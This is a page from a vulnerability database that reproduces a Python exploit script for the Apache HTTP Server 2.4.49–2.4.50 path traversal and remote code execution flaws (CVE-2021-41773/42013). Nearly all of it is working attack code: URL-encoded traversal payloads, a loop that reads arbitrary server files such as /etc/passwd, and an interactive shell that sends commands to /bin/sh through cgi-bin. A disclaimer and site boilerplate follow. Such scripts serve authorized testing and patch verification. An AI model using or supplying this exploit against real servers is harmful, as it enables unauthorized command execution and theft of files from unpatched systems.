Exploit source code: exploit_CVE-2021-41773.py

Attack Download Raw
CVE-2021-41773 7.5 
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
# !/usr/bin/python3
# Author: Ravin | Blacknote
# CVE-2021-41773 | CVE-2021-42013
# Apache HTTP Server 2.4.49-2.4.50 - Path Traversal & Remote Code Execution

# Usage: 
# python3 exploit.py 127.0.0.1 8080 rce 'id'
# python3 exploit.py 127.0.0.1 8080 file '/etc/passwd'

# Reference(s):
# https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

import argparse
import requests as req


# Path Traversal
payload1="/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e"
# Path Traversal
payload2="/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e"
# RCE
payload3="/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"


url = ""

def check(url):
    res = req.get(url)
    server = res.headers.get('Server')

    if "Apache/2.4.49" or "Apache/2.4.50" in server:
        print("[i] Host appears to be vulnerable.")
        
    else:
        print("[i] Host might not be vulnerable.")
        force = input("[!] Do you still want to run the exploit? (y/n): ")
        if force.lower() == "n":
            exit(0)

            

def rce(url, cmd):

    payload_url=f"{url}{payload3}"
    data = f"echo Content-Type: text/plain; echo; {cmd}"
    s = req.Session()
    r = req.Request('POST', payload_url, data=data).prepare()
    r.url = payload_url
    resp = s.send(r)
    if resp.status_code == 200:
        print("[*] Working Payload: " + payload_url + "\n")
        print(f"$ {cmd}")
        print((resp.content).decode('utf-8', errors='ignore'))
        while 1:
            cmd = input("$ ")
            if cmd =='exit':
                    exit(0)
            else:
                data = f"echo Content-Type: text/plain; echo; {cmd}"
                s = req.Session()
                r = req.Request('POST', payload_url, data=data).prepare()
                r.url = payload_url
                resp = s.send(r)
                print((resp.content).decode('utf-8', errors='ignore'))
    else:
        print("[!] Host seems to be patched.")
        exit(0)         

def traversal(url, file):
  
    payloads = [payload1, payload2]
    
    for i in payloads:
        payload_url=f"{url}{i}{file}"
        s = req.Session()
        r = req.Request('GET', payload_url).prepare()
        r.url = payload_url
        resp = s.send(r)
        if resp.status_code == 200:
            print("[*] Working payload: " + f"{url}{i}" + "/path/to/file\n")
            print((resp.content).decode('utf-8', errors='ignore') + "\n")
            while 1:
                file = input("File (Absolute Path)> ")
                if file =='exit':
                    exit(0)
                else:
                    payload_url=f"{url}{i}{file}"
                    s = req.Session()
                    r = req.Request('GET', payload_url).prepare()
                    r.url = payload_url
                    resp = s.send(r)
                    print((resp.content).decode('utf-8', errors='ignore') + "\n")
        elif i==payload2 and resp.status_code != 200:
            print("[!] Host seems to be patched.")
            exit(0)

def main():
    parser = argparse.ArgumentParser(description="CVE-2021-41773 & CVE-2021-42013")
    parser.add_argument("rhost")
    parser.add_argument("rport")
    parser.add_argument("opt")
    parser.add_argument("cmd")

    args = parser.parse_args()

    if "http://" or "https://" not in args.rhost:
        url = f"http://{args.rhost}:{args.rport}"
        
    else:
        url = f"{args.rhost}:{args.rport}"

    check(url)

    if "rce" in (args.opt).lower():
        rce(url, args.cmd)
    elif "file" in (args.opt).lower():
        traversal(url, args.cmd)
    else:
        print("[!] Invalid Option!")
        exit(0)

if __name__ == '__main__':
    main()

Exploit author: Ravin

Source: https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution

⚠️ Disclaimer: All content is for authorized security research and educational purposes only. Use of this material for illegal or unauthorized activities is strictly prohibited. By using this site, you accept full legal responsibility for your actions. Use at your own risk.

AVET INS is an owner of VULNDBASE brand and website. This product uses data from the NVD API but is not endorsed or certified by the NVD. See NVD page for more information. CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE page. KEV (Known Exploited Vulnerabilities) is a catalog maintained by CISA. EUVD is the official EU repository for timely, curated cybersecurity vulnerability intelligence and remediation guidance run by ENISA. DORA (Digital Operational Resilience Act) is and EU directive.

Copyright AVET INS 1997 - 2026